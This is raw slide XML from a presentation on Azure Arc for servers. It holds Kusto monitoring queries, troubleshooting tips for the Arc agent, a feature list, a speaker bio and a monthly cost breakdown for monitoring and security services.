          <a:xfrm rot="16200000">
            <a:off x="9657152" y="4071637"/>
            <a:ext cx="681006" cy="780117"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0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EBFE77E-9510-419F-A816-D801AE98E987}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8829631" y="5805396"/>
            <a:ext cx="2596128" cy="370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/>
              <a:t>Queries / Alert Rules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19693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20431E-9DE3-8DB7-9AE7-B47EC07953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InsightsMetrics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TimeGenerated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ago(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Origin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"vm.azm.ms"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and Namespace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"Memory"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todynamic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(Tags)[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"vm.azm.ms/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memorySizeMB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])/(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summarize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avg(Val)/(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by Computer,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_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ResourceId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project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Computer,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FreeMemoryGB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summarize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percentage = (sum(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FreeMemoryGB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/ sum(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TotalMemoryGB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 * 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by Computer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percentage &lt;= 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3114F2-2F3D-3F09-C5AB-15367294B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Some pratical -  Kusto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082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F20431E-9DE3-8DB7-9AE7-B47EC07953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InsightsMetrics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TimeGenerated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 ago(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Origin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Namespace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"Processor"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Name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UtilizationPercentage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summarize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avg(Val) by bin(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TimeGenerated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h), Computer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avg_Val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&gt;= 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99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E3114F2-2F3D-3F09-C5AB-15367294B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Some pratical -  Kusto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58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6995FFA-60E2-9189-20C7-FA786B3F45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EventLog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"System"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and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EventID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"6008"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InsightsMetrics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Origin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and Namespace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LogicalDisk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and Name == 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FreeSpaceMB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Disk=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todynamic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(Tags)[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"vm.azm.ms/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mountId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]),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Disk_Size_GB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todynamic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(Tags)[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"vm.azm.ms/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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diskSizeMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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 / 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summarize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Disk_Free_Space_GB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avg(Val) / (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1024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by Computer,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Disk,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Disk_Size_GB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_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ResourceId</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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where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1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Disk_Free_Space_GB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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&lt;= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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br>
              <a:rPr lang="en-US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3C84DC6-7512-8058-C012-92E0B3A0B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Some pratical -  Kusto queries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2831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762D8-7E54-0CC2-2442-FB3D2C358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Demo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> Arc for servers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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4F8FBBEA-1FD5-2F5D-CD5F-AE2122E4CDFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720183" y="1587610"/>
            <a:ext cx="10749412" cy="4538931"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="355600" indent="-355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8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25475" indent="-2698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04888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5213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80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•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sz="2400" b="1" dirty="0"/>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>running</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" b="1" dirty="0"/>
              <a:t> Azure Arc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0"/>
              <a:t>Managing Updates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0" err="1"/>
              <a:t>Extension</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0"/>
              <a:t> Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0" err="1"/>
              <a:t>Admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0"/>
              <a:t> Center</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0" err="1"/>
              <a:t>Policies</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0" err="1"/>
              <a:t>Monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0"/>
              <a:t>Defender for Cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0"/>
              <a:t>Service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0" err="1"/>
              <a:t>Map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0"/>
              <a:t>Azure Monitor Rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0"/>
              <a:t>Data Collection and log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0" err="1"/>
              <a:t>collection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95276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470CC80-A063-9654-26C2-1F3D785864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8091" y="1399074"/>
            <a:ext cx="10749412" cy="5086567"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>Trouble with VMInsight and Process map not showing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0"/>
              <a:t>Add the following to C:\Program Files\Microsoft Dependency Agent\config\MicrosoftDependencyAgent.properties then</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0"/>
              <a:t>amaio.subsystem.enabled=true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>Make sure that Resource Groups are mapped to services to easier do RBAC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>Deploy centralized policies and monitoring rules using IaC – Terraform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>If the agent or extensions break</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>SystemDrive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>%\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ProgramData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>GuestConfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ext_mgr_log</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>SystemDrive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>%\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ProgramData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>GuestConfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>extension_logs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>\&lt;Extension&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>azcmagent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> check (cli tool to install and debug)</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>Extension and auto update might not work properly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0"/>
              <a:t>Management can only be done using Portal or Azure CLI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0"/>
              <a:t>SSH Support for Windows Machines (also might require other ports for Admin Center)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>azcmagent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> config set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>incomingconnections.ports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> 22,443</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>Use of Windows Admin Center on an Azure ARC VM requires delegated role</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Windows Admin Center Administrator Login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Doesn’t work well with Azure AD B2B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3DF803-D3CD-4B8D-73E7-4DE569B50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Some useful tips when setting up Arc for servers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395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504" y="416606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Self-service capabilities with Arc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0A1E64F-6C0B-4F3A-BC07-AFE7BB797678}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2769140" y="1124239"/>
            <a:ext cx="1608308" cy="4525759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A4BCDEC9-7C0A-4F91-BCFA-0F73851A8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1108" y="2247125"/>
            <a:ext cx="723900" cy="66675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8C7D848-28E0-45A0-BE30-9C609AFBDEF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3119078" y="2852387"/>
            <a:ext cx="1121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b="1">
                <a:solidFill>
                  <a:srgbClr val="0A1B39"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Azure AD</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="0A1B39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376F4F-8473-4DDB-B772-620D9B818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41381" y="3284677"/>
            <a:ext cx="704850" cy="5524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BACE1E-69F5-4771-AB00-BE578A3873B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2729177" y="3808822"/>
            <a:ext cx="1693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200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0A1B39"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Azure Resource Manager</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0A1B39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09CA90-261A-01D2-6B14-DE7B8DFDE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22611" y="1302612"/>
            <a:ext cx="7334008" cy="47211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F16BF6-A3AB-45BC-35FF-ABF7B79CDC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242" y="2779616"/>
            <a:ext cx="723900" cy="790575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Arrow: Right 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64DC3C28-A7F9-719B-DE9B-284A4B3D151C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1662071" y="2946304"/>
            <a:ext cx="1120040" cy="643943"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="31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260CCD3-A342-D4FC-4C25-1D0F3E384D6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715360" y="3558188"/>
            <a:ext cx="1429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b="1" dirty="0"/>
              <a:t>End-user</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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062D7B3-F959-A1AB-B001-0FF03CD0C1D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7740" y="5256357"/>
            <a:ext cx="6533628" cy="914327"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rektangel: avrundede hjørner 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70184E38-D207-1B53-1885-26329BC49508}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2451370" y="4507150"/>
            <a:ext cx="2179288" cy="701510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b-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No API Support for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>yet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO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9060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612ACBED-DCB7-0F8A-F276-AE3C7F643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WHOAMI?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07613E-225E-16C6-758A-E072366581AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="852791" y="1526946"/>
            <a:ext cx="6783697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nb-NO" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00000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177CC0-D11F-B612-7625-32414157BB58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899809" y="1270783"/>
            <a:ext cx="6783697" cy="49484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Marius Sandbu</a:t>
            </a:r>
          </a:p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Cloud Evangelist @ Sopra Steria</a:t>
            </a:r>
          </a:p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Spending most of my time on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="2200" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security, Public Cloud and EUC</a:t>
            </a:r>
          </a:p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«Hobbies»</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Microsoft Cloud Security User Group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cloudfirst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Podcast</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"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nb-NO" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Blogging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msandbu.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Recently published a new book!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="nb-NO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384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ekst 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C816441-EFE1-E2DE-88C3-4B3D4A8882B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20183" y="1587610"/>
            <a:ext cx="8409640" cy="4538931"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>Standard Metrics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>(Free) – </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>Custom Metrics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>(OS specific metrics) cost </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>$0.16 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>per month</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>	One custom metric approx 8 bytes = 125 000 entries = </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>	One custom metric that checks every 15 seconds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>Log Collection (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>3$ per month per GB) + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0" err="1"/>
              <a:t>Sentinel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0" err="1"/>
              <a:t>Cost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>Log Alert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>$0.30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> every minute) for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>0.05$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> for check every 15 minutes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>Metric Alert (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>$0.10 for check every month per month)</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>Secure Web Hook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> ITSM – $5 / 1000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Events</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> ,- a month) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0" err="1"/>
              <a:t>Policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t> for Arc Machines ($6 Server/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0" err="1"/>
              <a:t>Month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>Azure Defender for Servers ($14 Server/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0" err="1"/>
              <a:t>Month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>Example – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>One machine that is used to monitor 4 log sources and 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>metrics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> and Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Log Collection (2 GB Logs) = $6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Custom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Metrics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> = $1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Log Alert = $3 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> + Defender = $20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>= $30 a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0" err="1"/>
              <a:t>month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
